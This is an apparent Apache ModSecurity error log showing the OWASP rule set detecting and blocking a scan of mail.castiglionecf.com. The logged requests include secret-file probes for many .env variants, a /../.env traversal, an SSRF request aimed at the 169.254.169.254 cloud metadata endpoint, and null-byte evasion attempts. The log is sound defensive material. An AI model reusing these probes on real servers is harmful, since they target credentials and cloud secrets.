[Tue May 12 05:29:59.498369 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.247:57286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeths7kySIUZ3ORnIl8gAAAQk"]
[Tue May 12 05:29:59.550854 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.247:57358] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.castiglionecf.com"] [uri "/_next/image"] [unique_id "agKet9r1yOh9TvizezifmQAAAEs"]
[Tue May 12 05:29:59.551556 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.247:57358] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/_next/image"] [unique_id "agKet9r1yOh9TvizezifmQAAAEs"]
[Tue May 12 05:29:59.970142 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.247:57280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetvaAnTZtx1_H_wy3agAAAUs"]
[Tue May 12 05:30:00.307717 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetRs7kySIUZ3ORnIl8AAAAQ4"]
[Tue May 12 05:30:00.393132 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.247:57252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetvaAnTZtx1_H_wy3aQAAAU8"]
[Tue May 12 05:30:00.405270 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.247:57258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetfaAnTZtx1_H_wy3aAAAAVA"]
[Tue May 12 05:30:00.430624 2026] [security2:error] [pid 1842385:tid 1842406] [client 43.173.1.69:44990] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/gaston/"] [unique_id "agKeuBs7kySIUZ3ORnIl9wAAARA"]
[Tue May 12 05:30:00.450962 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:57272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKets1tk6y7yBJLpJo5oQAAAI4"]
[Tue May 12 05:30:00.507092 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.247:57418] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetvaAnTZtx1_H_wy3awAAAVI"]
[Tue May 12 05:30:01.078169 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKettr1yOh9TvizeziflwAAAEM"]
[Tue May 12 05:30:01.104435 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.247:57348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetRfeipD4uoG21FowvQAAAAA"]
[Tue May 12 05:30:01.105312 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:57310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKettr1yOh9TvizezifmAAAAEY"]
[Tue May 12 05:30:01.114771 2026] [security2:error] [pid 1825287:tid 1825312] [client 45.148.10.247:57334] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetggpmE1yW0glLdguKAAAAMc"]
[Tue May 12 05:30:01.576901 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:57500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.save"] [unique_id "agKeuc1tk6y7yBJLpJo5qQAAAI0"]
[Tue May 12 05:30:01.577092 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:57500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.save"] [unique_id "agKeuc1tk6y7yBJLpJo5qQAAAI0"]
[Tue May 12 05:30:01.579964 2026] [security2:error] [pid 1842385:tid 1842400] [client 45.148.10.247:57446] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKeuRs7kySIUZ3ORnIl-AAAAQo"]
[Tue May 12 05:30:01.580121 2026] [security2:error] [pid 1842385:tid 1842400] [client 45.148.10.247:57446] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKeuRs7kySIUZ3ORnIl-AAAAQo"]
[Tue May 12 05:30:01.580253 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.247:57474] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.bak"] [unique_id "agKeuRfeipD4uoG21FowwAAAAAY"]
[Tue May 12 05:30:01.580380 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.247:57474] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.bak"] [unique_id "agKeuRfeipD4uoG21FowwAAAAAY"]
[Tue May 12 05:30:01.583060 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.247:57546] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKeudr1yOh9TvizezifmwAAAFY"]
[Tue May 12 05:30:01.583234 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.247:57546] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKeudr1yOh9TvizezifmwAAAFY"]
[Tue May 12 05:30:01.584842 2026] [security2:error] [pid 1844863:tid 1844881] [client 45.148.10.247:57488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.example"] [unique_id "agKeufaAnTZtx1_H_wy3bQAAAUw"]
[Tue May 12 05:30:01.584993 2026] [security2:error] [pid 1844863:tid 1844881] [client 45.148.10.247:57488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.example"] [unique_id "agKeufaAnTZtx1_H_wy3bQAAAUw"]
[Tue May 12 05:30:01.589679 2026] [core:error] [pid 1825179:tid 1825200] [client 45.148.10.247:57574] AH10244: invalid URI path (/../.env)
[Tue May 12 05:30:01.590050 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.247:57470] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.development"] [unique_id "agKeuQgpmE1yW0glLdguMAAAAMY"]
[Tue May 12 05:30:01.590172 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.247:57432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env~"] [unique_id "agKeuQgpmE1yW0glLdguMQAAAMU"]
[Tue May 12 05:30:01.590254 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.247:57470] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.development"] [unique_id "agKeuQgpmE1yW0glLdguMAAAAMY"]
[Tue May 12 05:30:01.590320 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.247:57432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env~"] [unique_id "agKeuQgpmE1yW0glLdguMQAAAMU"]
[Tue May 12 05:30:01.593155 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.247:57462] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production.local"] [unique_id "agKeuRfeipD4uoG21FowwQAAAAc"]
[Tue May 12 05:30:01.593305 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.247:57462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production.local"] [unique_id "agKeuRfeipD4uoG21FowwQAAAAc"]
[Tue May 12 05:30:01.594416 2026] [security2:error] [pid 1820198:tid 1820207] [client 45.148.10.247:57518] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.old"] [unique_id "agKeuc1tk6y7yBJLpJo5qwAAAIc"]
[Tue May 12 05:30:01.594560 2026] [security2:error] [pid 1820198:tid 1820207] [client 45.148.10.247:57518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.old"] [unique_id "agKeuc1tk6y7yBJLpJo5qwAAAIc"]
[Tue May 12 05:30:01.595859 2026] [security2:error] [pid 1842385:tid 1842405] [client 45.148.10.247:57512] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.backup"] [unique_id "agKeuRs7kySIUZ3ORnIl-QAAAQ8"]
[Tue May 12 05:30:01.596024 2026] [security2:error] [pid 1842385:tid 1842405] [client 45.148.10.247:57512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.backup"] [unique_id "agKeuRs7kySIUZ3ORnIl-QAAAQ8"]
[Tue May 12 05:30:01.612189 2026] [security2:error] [pid 1808852:tid 1808871] [client 45.148.10.247:57294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKethfeipD4uoG21FowvgAAABA"]
[Tue May 12 05:30:02.398403 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKetxfeipD4uoG21FowvwAAAAs"]
[Tue May 12 05:30:02.459946 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.247:57586] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKeus1tk6y7yBJLpJo5rgAAAII"]
[Tue May 12 05:30:02.460017 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.247:57586] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKeus1tk6y7yBJLpJo5rgAAAII"]
[Tue May 12 05:30:02.460054 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.247:57586] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKeus1tk6y7yBJLpJo5rgAAAII"]
